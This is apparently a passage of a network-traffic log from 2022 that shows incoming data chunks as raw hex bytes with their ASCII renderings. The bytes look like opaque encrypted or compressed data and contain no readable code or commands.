                                                                                                                                  2022-05-12 17:41:27 UTC161INData Raw: ac ba 86 22 e2 5a 23 df b8 f0 d5 78 0e e7 58 7d 3c 52 fb 3c 2c 77 d5 ad 83 cc 1d 3f 35 d1 85 d3 15 23 b6 f8 fe 0d d6 2a 8e ea e9 c8 04 e3 d0 ed 49 7b 46 2e a6 6c 91 f5 ac b9 ae 00 8b c2 18 f3 ec d9 04 53 f2 cd ca dc d5 23 32 e4 03 e5 87 72 9f 7b 0c b6 64 18 2b 17 55 8e ea 8f fd e7 9f ca 39 71 da 32 fd fe 36 e7 a9 4a dd 82 32 39 b3 33 30 d4 28 e1 3b 8a 9c 03 be 7e cd ab 30 5b 7a 6e 63 71 20 25 04 b8 f0 e0 93 36 61 bf 8e f4 f7 fe 76 12 1b ae 4f e3 7f 9b a1 df 63 07 40 27 1d ee 1b ef 9f 08 1d 2d ce 4e d3 a4 81 58 a8 72 6e ad 17 69 f3 1c fc 86 84 fc 69 e0 71 85 fc ad d4 09 64 66 3d ec f8 49 d7 17 65 05 e6 d1 4d dd 5b 9f 9d 86 27 1f de fa b6 03 f8 1a 22 bc f7 09 73 c3 3b 0c e9 66 02 a7 66 02 af fb 2a 3f e0 8f ae f2 8d 39 91 67 6e cc 7a 61 a8 66 1d 34 fe ab 8d
                                                                                                                                  Data Ascii: "Z#xX}<R<,w?5#*I{F.lS#2r{d+U9q26J2930(;~0[zncq %6avOc@'-NXrniiqdf=IeM['"s;ff*?9gnzaf4
                                                                                                                                  2022-05-12 17:41:27 UTC162INData Raw: 2d 19 bc 7b 33 b4 61 6b bf d2 56 00 4d f7 52 bd 8a d9 c6 05 ff 31 a7 b4 18 50 0e 6f 4f 0d a6 54 93 14 29 77 1a 22 25 a0 4a 2d 77 8f 7a 3d 25 5a 0d d1 7e 38 e1 ec b8 e1 2b 62 d4 04 70 cb b0 f4 eb af 34 bf e4 c5 d5 6f de a6 ca f8 be 83 22 e2 7f 51 d8 b8 ed c8 52 37 c9 cd 7e 39 52 fb 4c 77 75 d5 b0 9e e6 24 0b a2 d0 81 c3 15 53 34 3d ff 10 cb 06 b7 d5 73 cb 01 e3 d0 21 ce 79 46 33 bb 5f a8 bd 30 b3 aa 00 8b 0e 05 e1 ec ec 1b 6e cb 99 55 de d1 23 32 5b b5 e7 87 5f 80 39 35 e2 c6 1b 2f 17 45 78 8f 9d fd da 80 8d 00 25 7c 31 f9 fe 36 15 75 48 dd bf 2d 7e 88 6b 9a d6 2c e1 3b af 32 10 be 43 d2 ec 0c 07 d7 6f 67 61 20 79 1a 77 f1 fd 8e 71 5d df 3f f7 f2 fe 76 de b5 ba 4f ae 60 d3 9d bb d0 04 44 27 0d 22 4a ec 9f 35 02 67 f2 20 66 a5 85 58 a8 f7 8b 75 16 74 ee 56
                                                                                                                                  Data Ascii: -{3akVMR1PoOT)w"%J-wz=%Z~8+bp4o"QR7~9RLwu$S4=s!yF3_0nU#2[_95/Ex%|16uH-~k,;2Coga ywq]?vO`D'"J5g fXutV
                                                                                                                                  2022-05-12 17:41:27 UTC163INData Raw: b3 c4 89 06 34 49 7d 0e d9 ea c0 17 b3 2b a7 6e fe 26 47 41 9d 0a 79 1b 65 85 bf ff 5b b4 d4 bb 7e 9d 64 b3 98 25 72 6a f0 21 6f 2d 7c da 3b ed fb 9b e8 33 fb 17 7f c7 92 7c c7 88 a2 83 4f f1 5b 55 88 53 f2 49 ca 0e 3b 85 63 4d 15 ac b1 e0 fc 8c b5 4d 85 ee 4c 79 c7 87 31 cb 51 4f cf db 25 73 b6 b5 02 22 33 45 70 0d 23 0f 13 70 56 f2 6b 54 46 f1 63 4e 05 0b b6 ef 9b df 4b 3d b2 e6 91 30 a7 9c c1 b4 4b bd eb cb a3 c2 69 54 38 a3 29 a1 84 08 ec 7e 8f 5b f2 79 83 6c e9 b3 07 36 58 f0 a1 60 eb c0 7f 9c e8 99 51 41 c8 29 07 93 db a0 8e 06 ac 64 61 a6 52 2c 05 3b 6d e8 1e d4 28 3a d9 96 00 17 17 ff d7 31 06 a5 67 6b 11 d1 49 b5 95 35 fc 34 3c b3 7f b3 df 36 7a b7 77 dc d7 33 f1 c6 29 08 6d f7 d1 70 58 7e 21 e5 54 a4 46 8d e8 cd c9 f6 53 3e 2d bf de f5 a3 4f 88
                                                                                                                                  Data Ascii: 4I}+n&GAye[~d%rj!o-|;3|O[USI;cMMLy1QO%s"3Ep#pVkTFcNK=0KiT8)~[yl6X`QA)daR,;m(:1gkI54<6zw3)mpX~!TFS>-O
                                                                                                                                  2022-05-12 17:41:27 UTC164INData Raw: f7 ed 36 14 af 51 df ef 10 7e b3 6a 30 d1 31 37 1b bc 9e 02 be 1b ef ec 30 06 7a 68 7a b7 00 6a 06 75 f1 9d b3 71 61 de 8e e7 ef 22 56 5b 1a af 4f 22 5d d3 a1 ba 63 16 49 cc 02 b6 1a ee 9f f1 3f 67 ce 21 d3 b7 88 f5 b1 68 67 60 16 88 d3 56 fc f5 84 ed 61 9f 6e e3 fd ac d4 20 45 2c 3d 90 f8 58 df 87 44 0f e0 d0 4d ac 7a d5 9d 03 27 5b dd ed 92 ec f8 1b 22 39 d4 5f 73 65 3b 48 eb af 0b 35 61 00 af 3a 0b 66 e0 29 ae 71 8c e5 90 df 6d 02 7b 68 8a 00 1d 9c fe e7 8e 58 05 52 f6 37 0d 82 f0 3c c8 0d 21 9c 74 b7 ac 23 f2 2c ad aa 3a ab 85 ed e3 9c c1 cc f5 c4 1a 15 03 66 fe a9 ba 49 f0 07 c7 e3 76 5a 42 bb 43 97 ef a0 80 f4 d0 a9 ee 1b 35 cb 31 06 38 2e 1c 94 28 45 83 26 4d dc a4 bc 78 8f e2 25 6a 0d 0b bb 36 94 94 28 6f aa eb 17 31 1a 4b ca 6c 9f 2f 2a 5f 55 33
                                                                                                                                  Data Ascii: 6Q~j0170zhzjuqa"V[O"]cI?g!hg`Van E,=XDMz'["9_se;H5a:f)qm{hXR7<!t#,:fIvZBC518.(E&Mx%j6(o1Kl/*_U3
                                                                                                                                  2022-05-12 17:41:27 UTC165INData Raw: a8 99 a4 86 b9 aa 7f 69 a0 51 da 42 23 d9 e4 93 2f 26 21 d1 90 00 db 15 b6 81 34 b4 63 fc 3b 10 d7 49 0a 93 6c f6 32 7a 95 bc a2 93 39 72 7b 61 8c c7 35 f1 0a 39 13 a1 d1 44 bc 51 70 07 86 54 68 47 95 fc c3 cf 39 ea 2f 27 b9 86 2f a5 57 aa 01 32 6d 0c 53 ae 71 1e c0 41 fd 4c 6a 45 e5 ff a7 86 27 3e a4 bc 27 df 8f 62 e2 fa f7 05 ce 65 a6 1c d1 ec 90 74 41 e8 51 87 8c cd 72 8f 8a 5d f4 6a 2d 26 17 29 5c 2d 80 57 c7 15 cd 67 88 24 04 f5 32 32 8f 40 6e b8 da 9a cd aa fe 5a a0 e8 90 c7 3e de 33 a1 bc a7 4e e9 66 47 10 dd 01 92 50 28 72 1c 2a f3 76 58 2d 7f 92 f4 6f 24 1f 0c d4 79 38 2d 1f ad e1 23 7f 75 5a 71 85 b1 f1 ec af 8b 9c f5 c5 dd 72 66 f8 cb ac bf 86 66 e0 19 26 25 b1 e5 d5 5d 67 c8 58 7f 3c 16 f9 42 39 64 d5 b9 83 e6 1d 0a 35 d2 84 c5 0d 85 91 7e fd
                                                                                                                                  Data Ascii: iQB#/&!4c;Il2z9r{a59DQpThG9/'/W2mSqALjE'>'betAQr]j-&)\-Wg$22@nZ>3NfGP(r*vX-o$y8-#uZqrff&%]gX<B9d5~
                                                                                                                                  2022-05-12 17:41:27 UTC167INData Raw: 3d 3b ab 85 ed e3 9d 41 00 e2 89 d7 16 59 dd ff a9 ba 49 f0 01 5f 35 40 69 fd bf 19 24 ee a0 80 f4 d0 aa 66 a2 2a 64 fd 05 58 95 1d 94 28 45 83 20 d5 0a 92 8f b4 8c 8b 3d 6a 0d 0b bb 36 82 14 e4 78 0f 27 14 42 38 4b ca 6c 9f 2f 3c df 99 24 2b d3 bb 0d b1 84 c5 e8 51 13 17 a5 43 cd 62 91 fc 25 42 74 c3 3d a5 29 06 e3 49 da d2 7d 55 9a 49 f1 55 66 c2 ef b8 40 81 8d d0 ea 8b ee c3 bc ed 2a 94 d5 57 20 a3 bc 18 a0 01 e3 54 a0 48 b1 c7 99 50 34 cc 62 2d 05 bd f7 9e 99 28 b7 38 7e 3a d5 42 9b 7c 46 ad a1 89 85 a9 db d0 c6 b8 ee cb f2 49 56 27 a9 33 5a 8d 7c 2e 6c 8c 3b f1 eb b8 34 34 1d 4e 53 df c4 b6 47 44 a3 b6 59 bf 0d ca c2 76 c8 1f 26 64 3a b0 73 1b 93 46 61 f5 8d ca 1f 68 e3 46 5c 2f 47 f7 50 fd eb 17 5c 87 0d 46 16 7d 82 a7 3a 70 66 13 f5 e3 ad 34 6c f4
                                                                                                                                  Data Ascii: =;AYI_5@i$f*dX(E =j6x'B8Kl/<$+QCb%Bt=)I}UIUf@*W THP4b-(8~:B|FIV'3Z|.l;44NSGDYv&d:sFahF\/GP\F}:pf4l
                                                                                                                                  2022-05-12 17:41:27 UTC168INData Raw: 92 cc f7 72 1a 32 25 50 4b e1 76 95 6d 4c 24 2b ea d4 7f 38 e1 18 b6 48 26 55 c3 79 71 ed 57 f1 ea af 34 9c ee 77 d8 42 c9 db cb d8 59 86 22 e2 7f 27 d7 7b ca f8 53 4a c8 f0 99 3c 52 fb 4c 2d 7f 1b 97 a8 e2 59 0a 81 37 84 c3 15 53 b7 3c 45 35 95 11 ca d4 01 2c 04 e3 d0 21 4e 73 80 16 e8 48 d5 bc 58 54 af 00 8b 0e 1f fb 64 ea fb 6c b6 98 e2 38 d4 23 32 5b 03 ed 16 59 7c 3a 48 e3 55 fd 2a 17 55 78 ed 97 2b fa 8e 8d 7d 24 9e d7 fc fe 36 15 a9 4a 11 be 78 7f f7 6a 28 3e 29 e1 3b af 98 1b 68 63 77 fb 74 06 e6 87 62 61 20 79 00 74 3d fc 40 66 25 de a6 1d f7 fe 76 de 0b ae 83 af a4 c4 e5 ba 0b ee 41 27 1d 22 1c ef 53 34 fb 70 8a 21 cb 49 80 58 a8 f7 66 61 da 75 e7 4e b9 f5 48 0e 69 e0 71 49 ec ad 18 15 d3 21 7b 90 f6 b9 d7 17 65 ba e6 c9 9b e0 48 d5 db 03 03 ef
                                                                                                                                  Data Ascii: r2%PKvmL$+8H&UyqW4wBY"'{SJ<RL-Y7S<E5,!NsHXTdl8#2[Y|:HU*Ux+}$6Jxj(>);hcwtba yt=@f%vA'"S4p!IXfauNHiqI!{eH
                                                                                                                                  2022-05-12 17:41:27 UTC169INData Raw: 2e ca e4 69 9a 35 62 bc 74 61 66 69 6c 0c fa f0 f8 98 f8 26 fd 38 64 33 8a 6d 47 b8 e7 b7 5f a7 db f9 8e aa e3 36 48 bf 3a c4 36 1a 95 5e b7 c6 ec 70 31 84 9d 9c 5c b3 0f f6 36 fe 41 0a 4f 24 3a aa bc a4 82 ef 71 71 60 0b 23 d0 12 e0 42 18 71 df 47 86 27 49 05 b4 b0 e7 93 f7 6a 27 a9 ba 99 ee ea 6f c7 af 43 a8 eb eb a4 35 7b 15 38 cf 78 e9 94 0e ec a1 8e 38 dd 93 99 94 ef 3e 5f 31 58 80 a6 68 e3 e9 7a bc f3 9a 41 9f 9b e4 06 88 d3 b5 8e cd 80 93 73 e7 52 9e 51 21 65 ee 1e 35 2e 9e d7 b9 02 9c 16 72 92 36 06 69 66 21 18 8e 4c e6 89 2b f5 ca 6b 97 7d a8 d7 23 7a 8d 77 c0 c5 72 f1 0a 71 0a 7d f1 c1 af 59 ee 09 0f 4e 2f 47 41 b0 ca c9 3a 52 35 2f 28 db a6 bf 10 8a 01 78 64 1e 50 13 6b 16 08 c3 74 56 2d 45 11 b1 a6 4a 26 83 be b4 ee da 63 78 a5 7a a3 71 ef a9
                                                                                                                                  Data Ascii: .i5btafil&8d3mG_6H:6^p1\6AO$:qq`#BqG'Ij'oC5{8x8>_1XhzAsRQ!e5.r6if!L+k}#zwrq}YN/GA:R5/(xdPktV-EJ&cxzq
                                                                                                                                  2022-05-12 17:41:27 UTC170INData Raw: 06 74 f1 fb 93 bd 60 f3 8f b1 f7 d2 a5 df 1a ae 4f a8 7d 25 a0 29 6b 42 41 97 ce 23 1a ef 9f 33 1f ab cf 39 fa e3 80 f0 7c f6 67 61 16 72 f3 e9 fa 62 98 b9 69 34 a4 48 fd ad d4 12 64 93 3b ad fb 0c d7 3b b3 bb e0 d1 4d c6 43 03 bd bc 27 5a df 1e 60 ce f9 1a 22 80 ed 83 53 e0 3b 49 e9 d2 20 18 60 02 af e0 32 b0 c0 3a ae b5 8c d9 46 e0 6c 00 7b 7a a0 66 04 d4 ff e6 8c 17 ce 1b f7 35 0d cc da 4e d1 b2 21 ca 74 4b 75 42 f3 2e ad 34 10 81 a3 bc ca da c1 64 2c a8 1b 17 03 d4 d4 9a 9c 29 d9 46 df 45 8e 48 42 b9 43 2d d5 76 a0 4b d0 ed e6 8a e7 45 31 04 38 9b 3e 58 29 8e aa 67 55 1a 58 ae 78 8d e2 33 49 c1 0a 6f 30 c5 94 aa b2 2e eb 15 31 26 70 16 4c 1a 2f 7b 5f 2d 10 0b 1f ba 8e b8 bf 13 c8 42 13 50 25 1f 07 43 5d fd b7 5b 57 0f 3c 9e 23 41 63 59 11 f3 b1 54 01
                                                                                                                                  Data Ascii: t`O}%)kBA#39|garbi4Hd;;MC'Z`"S;I `2:Fl{zf5N!tKuB.4d,)FEHBC-vKE18>X)gUXx3Io0.1&pL/{_-BP%C][W<#AcYT
                                                                                                                                  2022-05-12 17:41:27 UTC172INData Raw: d7 df 0a e0 6a c1 30 6c 96 85 51 d6 30 7a 7b e0 e9 24 34 c5 08 78 0b 69 0b c0 bc 59 70 b5 e3 82 6e 73 97 ba cb f9 c0 53 26 2f b9 48 4a b7 55 be 03 74 65 55 aa 12 78 16 c0 7f 98 45 6d 71 e7 be a7 2d dc 82 ad b4 27 49 8f 2b e0 4e f5 44 ee 2b 5d c4 d8 e4 90 e2 41 20 56 33 8e 8c 52 dd 71 65 fd 62 2d b0 17 5a 5e 99 82 16 e7 63 36 b8 81 2c 04 2a 55 ae 86 54 6c ee d2 80 36 4d f7 52 a0 1c f7 5a 3c ca 31 f7 b4 ea b2 0e 6f 4f 10 30 66 c3 42 1c 70 4a 32 2b ad 4a 2d 77 92 ec 08 e3 1d 38 d6 2f 38 c8 e5 bf e1 2b 7f 42 3d 0a 97 85 f3 ba af 71 61 e7 c5 d5 72 48 9f 3a ae 8b 84 72 e2 1e da de b8 ed d5 c4 0e 0b 4b 4b 3e 02 fb 31 d0 76 d5 b0 83 70 1d 37 36 e5 86 93 15 ca 4a 35 ff 10 d6 90 8e 12 fd fe 06 b3 d0 94 b3 7a 46 33 a6 c9 91 db af 86 ad 50 8b de e2 f2 ec ec 06 f8 f2
                                                                                                                                  Data Ascii: j0lQ0z{$4xiYpnsS&/HJUteUxEmq-'I+ND+]A V3Rqeb-Z^c6,*UTl6MRZ<1oO0fBpJ2+J-w8/8+B=qarH:rKK>1vp76J5zF3P
                                                                                                                                  2022-05-12 17:41:27 UTC173INData Raw: f4 8b af d2 a0 6c 44 6e 00 3a 9a 3e 94 be 45 23 0a 61 08 d4 af f9 89 e0 32 49 0d 9d bb a5 87 a0 e6 3e 2f 48 11 33 37 68 ca fa 9f e5 16 6b 9b 62 0b db be 8c be a7 c5 7e 51 d8 12 11 41 8b 42 bb f9 b5 4d 57 c3 ab a5 6c 2d 57 4b 9c f2 b9 51 03 46 d7 55 f0 c2 1d bd f4 83 cb f0 0c 8f 4d cc 9a ed bc 94 24 7c 94 a1 ff 38 20 05 4c 5b 87 48 27 c7 80 56 80 ce 24 0d a7 b9 42 91 b1 28 21 38 4a 14 61 40 dd 5c 69 ae 65 86 af a9 4d d0 50 b9 5a c9 b4 69 2b 23 60 3c 70 8d ea 2e 1a 8a 8f f3 a8 98 2a 30 ff 41 79 df 06 2a a1 45 97 b4 0f a7 28 ef 8c 66 e2 1f dc f8 e3 b6 47 19 c5 5e a3 d3 ee da 35 68 11 db 49 2d 73 f5 66 fe 74 1f 4d 87 27 46 30 e3 8e a0 0e 72 30 0b 75 c5 10 34 46 f4 fd 98 0b e8 5f 4a 55 b4 c8 f2 91 d9 4b cb 25 fd 52 31 93 6c 97 af da bd e9 ee a1 d9 f7 52 4e 6d
                                                                                                                                  Data Ascii: lDn:>E#a2I>/H37hkb~QABMWl-WKQFUM$|8 L[H'V$B(!8Ja@\ieMPZi+#`<p.*0Ay*E(fG^5hI-sftM'F0r0u4F_JUK%R1lRNm
                                                                                                                                  2022-05-12 17:41:27 UTC174INData Raw: f7 9b 36 ca e6 56 c5 70 de 9f cb 3a bf 03 26 d6 7d 71 df 0d fd d7 52 0e c8 ce 7f 42 4f cf 4e 7b 77 03 a0 81 e6 1d 0a a3 d1 2b c7 21 51 e1 34 08 00 d4 06 8e d4 7f ca ac fe e4 23 18 7b 5e 22 a4 5f 91 bc 3a b2 76 04 bf 0c 49 f3 d5 fd 04 6e f2 98 5c df e7 02 06 59 55 e5 dd 4e 9f 39 0c e3 f2 1a 20 12 61 7a bb 8f 86 cb 9f 8d 39 24 4c 30 c3 d8 02 17 ff 4a 40 ae 32 7e b3 6a a6 d7 1d e4 0f ad ce 03 00 52 cd ec 30 06 ec 6e 1b 4b 14 7b 56 74 11 ec 91 71 61 de 18 f6 a9 fb 42 dc 4a ae 4d bc 7f d3 a1 ba f5 05 e2 0d 29 20 4a ef bc 27 1d 67 ce 21 45 a4 16 5d 9c f5 37 61 52 66 f1 56 fc f5 12 fe a4 ca 45 4b ad ad b2 06 66 2c 3d 90 6e 4b 19 12 51 b8 b0 d1 ca d2 59 d5 9d 03 b1 1d 97 d1 82 cd a9 1a 8a 83 f7 5f 73 65 ad 0e 1c 63 36 1a 30 02 65 f4 28 66 e0 29 38 f2 78 02 a5 e3
                                                                                                                                  Data Ascii: 6Vp:&}qRBON{w+!Q4#{^"_:vIn\YUN9 az9$L0J@2~jR0nK{VtqaBJM) J'g!E]7aRfVEKf,=nKQY_sec60e(f)8x
                                                                                                                                  2022-05-12 17:41:27 UTC176INData Raw: d9 ba 8e a1 fe 1d 4a f8 3a 26 73 05 80 6a b5 85 ec 32 29 6a 87 db 5c b9 47 5b 35 ca 43 49 4f 8d 3a 44 a6 e3 82 31 3a fc 75 3f 21 93 12 1f 5b f6 6b 98 47 7c 6b 9e 06 80 b2 a4 93 94 56 c9 b3 fd 99 a0 a7 0c d0 9b 41 eb eb 80 bc db 61 52 38 f9 28 e8 90 3a ee e2 8e 92 e6 7d 83 d3 ef 7c 0e ad 40 b4 a4 2b e3 74 62 52 e9 dd 41 d1 c8 cf 02 bc d1 f6 8e 6d b7 7d 69 a0 52 4c 04 40 79 da 1c 76 2e d4 cc 92 00 db 16 20 c7 69 02 5d 64 62 18 c0 57 08 93 6c f5 a4 3c db 60 9c d5 60 7a 43 68 eb c7 35 f1 9c 28 83 79 c5 c3 ec 59 2a 3d e1 54 68 47 03 ea 4a d4 0e 50 76 2f c2 c0 48 a5 57 8a 97 24 d7 1a 64 11 28 16 5d f7 9a 4c 6a 45 73 ee 0c 57 12 81 fd b4 98 c1 8d 62 e2 7a 61 14 32 ad 93 c7 88 e4 71 6a 43 e8 51 07 1a dc 64 62 bf 66 ad 62 2e 39 15 29 5c ad 16 46 ea dc f8 bb d1 2c
                                                                                                                                  Data Ascii: J:&sj2)j\G[5CIO:D1:u?![kG|kVAaR8(:}|@+tbRAm}iRL@yv. i]dbWl<``zCh5(yY*=ThGJPv/HW$d(]LjEsWbza2qjCQdbfb.9)\F,
                                                                                                                                  2022-05-12 17:41:27 UTC177INData Raw: 1f 61 e7 23 d3 a4 80 ce a8 66 65 55 14 24 f3 71 d5 f7 84 fe 69 76 71 6e ef 99 d6 44 64 65 14 92 f8 4b d7 81 65 01 e2 e5 4f 90 5b be b4 01 27 1d df 6c b6 a0 eb 2e 20 c1 f5 d2 5a 67 3b 0e e9 f0 02 fd 62 36 ad b6 2a c9 c9 2b ae f2 8c bf 91 56 7f 34 79 2c a8 d1 34 9e fe a1 8c a5 16 3d f4 01 0f 9a d2 cf e1 0f 21 8d 74 ed ad f9 e7 1a af 62 18 be af ef e3 9d c1 96 f4 f2 18 23 01 82 dc 9e 90 4b f0 01 df a3 56 be 56 8d 41 7b cd f8 aa f6 d0 aa e6 34 3c c1 32 30 3a ca 3e ed 02 47 83 20 55 9c 84 8e 6d b9 e0 62 49 96 21 b9 36 82 94 72 6e 80 e8 21 33 67 68 77 46 9d 2f 3c 5f 0f 32 84 0a 8e 8c ee a7 1b c2 53 13 17 25 d5 db 9b 5e c9 b5 1d 57 c3 16 a7 29 06 63 df cc 97 a6 60 03 16 d7 77 4d c0 ef b8 c0 17 9b f3 22 be 4d 9c 9a a9 01 96 d5 57 a0 35 af 98 74 34 4c 0b 87 2d 9a
                                                                                                                                  Data Ascii: a#feU$qivqnDdeKeO['l. Zg;b6*+V4y,4=!tb#KVVA{4<20:>G UmbI!6rn!3ghwF/<_2S%^W)c`wM"MW5t4L-
                                                                                                                                  2022-05-12 17:41:27 UTC178INData Raw: 78 42 8d c9 d8 cd 8d c4 0b d8 30 fc fe a0 15 f2 58 e9 bd 60 7e ad 5a 32 d7 29 e1 ad af 4d 01 8a 41 9f ec 0f 36 78 6e 62 61 b6 79 8b 66 c5 ff c3 71 01 ee 8c f6 f7 fe e0 de e7 ac 7b ac 2d d3 23 8a 61 05 41 27 8b 22 c8 fc ab 37 4f 67 6a 11 d1 a4 80 58 3e f7 2e 62 22 76 a3 56 39 c5 86 fe 69 e0 e7 49 2f b9 e0 16 34 2c da a0 fa 4b d7 17 f3 ba 93 d2 79 c2 0b d5 95 32 25 1d df fa 20 cf f6 0f 16 93 a5 5f 5a 54 39 0e e9 66 94 18 fd 01 9b e4 7a 66 ab 18 ac f2 8c 29 07 e1 11 15 4f 7e f8 00 71 ad fc a1 8c 33 80 1a 30 36 39 c8 82 3c 45 3c 23 8d 74 7b 3b 43 5a 38 99 30 48 ab 2b dc e1 9d c1 00 62 a9 ea 14 37 d0 8c a9 75 78 f2 01 df 35 c0 49 08 a1 77 29 9d a0 70 c5 d2 aa e6 a2 aa 44 2a 00 0c 98 6e 94 39 77 81 20 55 0a 12 af 74 94 d6 30 19 0d 39 89 34 82 94 e4 f8 2f a4 11
                                                                                                                                  Data Ascii: xB0X`~Z2)MA6xnbayfq{-#aA'"7OgjX>.b"vV9iI/4,Ky2% _ZT9fzf)O~q3069<E<#t{;CZ80H+b7ux5Iw)pD*n9w Ut094/
                                                                                                                                  2022-05-12 17:41:27 UTC179INData Raw: cd f2 7d 00 e9 fa 7d 45 c8 e5 06 1e d3 14 8f 8d a8 2f 69 e9 6e d8 04 20 65 78 1e a4 28 15 d3 c0 00 b0 2a b4 c7 37 06 ff 66 c0 19 e3 4b 5a 93 e1 c9 30 3c 96 7d 3e d7 d5 7c 4f 74 b9 c7 9a cd 08 28 0b 7d 67 c1 9d 5b 44 21 b3 54 b8 7b 97 ea cb c9 ac 52 3e 28 8d dc 1a a5 a6 b6 03 24 65 1e c6 13 20 14 f4 eb c8 4c 79 78 e7 ee a7 4a b0 83 05 bc 13 dd df 62 d7 47 f5 14 ee a9 31 c5 5a e6 a4 76 11 e8 07 3a 8e dc 52 43 1d 64 89 68 19 24 47 29 2b 90 82 46 e7 d9 5a b9 2d 2e 30 be 05 32 17 5d 6c be d2 56 5a 4c 97 40 94 88 a7 c7 84 c3 31 a7 b4 18 de 0f b9 4d 24 a4 36 92 8b 15 70 1a 32 25 c0 4b bd 65 a6 78 58 24 e2 31 d6 7f 38 e1 88 be e1 28 4b d6 6d 71 9a 8f f3 ea af 34 0c e6 10 c6 46 dc cf cb ec 81 84 22 e2 7f b7 df f4 ee e1 50 5e c8 3a 41 3e 52 fb 4c bd 77 00 a4 b7 e4
                                                                                                                                  Data Ascii: }}E/in ex(*7fKZ0<}>|Ot(}g[D!T{R>($e LyxJbG1Zv:RCdh$G)+FZ-.02]lVZL@1M$6p2%KexX$18(Kmq4F"P^:A>RLw
                                                                                                                                  2022-05-12 17:41:27 UTC180INData Raw: ca 5d 21 d2 3c 79 ad 43 f3 b8 ad b7 32 9f 87 bd e3 1c 89 02 f4 a9 1b 81 03 b8 d9 9d b8 19 f0 a2 97 37 56 49 42 2f 43 84 e7 94 82 a4 d0 6f ae a0 3c 44 31 92 38 38 3b a0 2a 15 83 c7 1d 08 84 af 78 1b e2 eb 63 39 09 eb 36 8b dd e6 6e 2f eb 83 31 ed 6d fe 6e cf 2f 16 16 9b 32 0b 1f 2c 8e 7c 8c f1 ea 01 13 5b 6c 41 db 42 5d 6b b7 4c 51 f7 3f f5 29 6b 2a 4b cc f2 b1 c2 01 46 fb 61 64 92 ef 37 89 83 9b f0 26 1c 4f e4 9c d9 28 c4 d5 e7 e9 a1 af 38 6c 96 4e 18 a9 7c b3 97 99 82 fd ce 74 0d c9 2a 40 24 b0 1c b5 68 7e ce 1c 40 8d 5c f9 3d 67 03 a9 9d d9 80 c6 ae 24 c9 e4 69 9a b0 62 c9 71 b9 7e 7e 6c bb f1 f3 f8 98 f8 a3 fd a9 7f eb 92 7a 47 1d e9 b4 5f a7 db 7c 8e 42 e0 2b 48 a8 3a cb 39 19 95 5e b7 43 ec c1 32 5c 85 8b 5c b2 0d f5 36 fe 41 8f 4f dc 25 72 a4 b3 82
                                                                                                                                  Data Ascii: ]!<yC27VIB/Co<D188;*xc96n/1mn/2,|[lAB]kLQ?)k*KFad7&O(8lN|t*@$h~@\=g$ibq~~lzG_|B+H:9^C2\\6AO%r
                                                                                                                                  2022-05-12 17:41:27 UTC181INData Raw: 33 2a e0 1a 48 0f 6f d9 10 cc 62 a6 52 78 72 b5 66 27 56 4b 2d e1 92 23 15 10 1d 5c d4 af 6c e3 1e be e1 bd 7f 40 39 45 87 e1 f1 18 fb 36 9a e6 c5 43 72 53 82 ff ae ef 86 31 b7 7d 21 df b8 7b d5 ec 0a fc 5a 2f 3c 67 ae 4e 2b 77 d5 26 83 51 00 3e 37 81 84 94 40 51 b1 34 ff 86 d6 e9 8a e0 eb 9a 04 9a 85 23 48 7b 46 a5 a6 1d b0 88 ae e2 af 9b de 0c 19 f3 ec 7a 06 77 f7 ac c8 8f d4 9e 67 59 05 e5 87 c9 9d 77 2a d7 66 4a 2a c8 00 7a eb 8f fd 4c 9d ce 3c 10 d8 60 fc fe 60 17 af 4a dd 29 30 f6 99 5e 32 87 29 c3 6d ad 9e 03 be d5 cf 81 35 32 78 3e 62 25 76 7b 06 74 f1 6b 93 c3 4b ea 8c a6 f7 96 20 dc 1a ae 4f 3f 65 0f 81 3f 63 55 41 27 1d 23 1a aa 82 25 0f 65 ce 21 d3 b4 90 5b a8 f7 67 71 06 70 f3 56 fc e5 94 ff 69 e0 71 59 ed ac d4 14 64 3c 2d 91 f8 4b d7 17 65
                                                                                                                                  Data Ascii: 3*HobRxrf'VK-#\l@9E6CrS1}!{Z/<gN+w&Q>7@Q4#H{FzwgYw*fJ*zL<``J)0^2)m52x>b%v{tkK O?e?cUA'#%e![gqpViqYd<-Ke
                                                                                                                                  2022-05-12 17:41:27 UTC183INData Raw: 52 ea ab 66 87 c4 ba d0 d4 3f b9 ad c5 f4 6d 7b 27 88 11 67 89 75 2c 8a af a5 f5 19 99 2e 16 d9 45 98 de 1c 3b ba 45 42 b7 95 8e f0 ee 6f 67 b4 38 b7 f9 db b1 d6 3f be 5a 56 d4 c3 f2 8a 68 66 da 65 26 f8 f7 d7 ff 50 17 f0 87 c6 47 cb f7 b2 a3 db 71 a8 1c 16 c7 cb 35 56 fb 50 9c a6 eb f3 46 46 b0 59 f5 18 ce 7e cf 42 fc 4f 16 ee 6a 36 ae 99 b3 a3 ef 50 d8 c5 5c 2b 6f f1 e9 6c 1d ff b2 67 03 5f 71 90 d3 f6 e8 63 38 fd 83 bf 79 b2 da 2f 54 f0 df e5 49 db e5 37 8a 05 86 9d b9 83 7d bf 80 74 da 35 22 cc c7 a1 26 1f 23 9f 87 fd da 27 b4 3a 14 fb 68 57 30 ce f4 36 0e a2 6e b1 1b 17 92 44 aa 01 10 c5 7b 37 eb 11 15 77 0e 69 09 3f d6 7e bc 18 72 09 f4 a9 69 16 97 3c eb da 3a 03 24 94 b4 61 4a f4 55 57 0a 9b 65 57 52 c5 58 86 c4 a0 9a 81 70 df e1 8f a5 b9 2d 3c ad
                                                                                                                                  Data Ascii: Rf?m{'gu,.E;EBog8?ZVhfe&PGq5VPFFY~BOj6P\+olg_qc8y/TI7}t5"&#':hW06nD{7wi?~ri<:$aJUWeWRXp-<
                                                                                                                                  2022-05-12 17:41:27 UTC184INData Raw: 47 4e ee b1 21 60 65 6b 60 bb 5f bc 71 f8 fc a0 56 db db 87 f7 9e db 55 d5 76 ae 9f 86 50 d2 a8 bb f2 23 fb 22 1c 23 ae f0 ad 3e 6b 67 d6 39 92 af f4 58 a7 ef 2f 6a ef 76 cf 54 90 fe b5 fd a9 e8 1d 42 d4 a8 5a 39 16 27 c4 92 fc 6e ab 1c d4 ba e3 c5 79 c2 da d4 9d 0a 0a 1c 56 f8 dd dc b1 1b eb 93 23 7f 60 65 0a 0b 3f 46 bd 18 51 07 25 c1 59 60 81 2a c6 e3 25 2f 58 e3 28 2d c2 77 71 04 86 89 43 aa 1d 32 18 11 7a 37 24 cb e1 35 0a 06 20 8c 1f 68 65 48 8f 2e 7b 12 0b ab c4 e8 e5 8f b3 02 55 a8 d4 05 05 de 05 a8 ce 5c 55 02 96 30 80 69 fd b9 12 2e 1b 80 93 f4 89 ab 0a ae 54 48 e8 05 8b 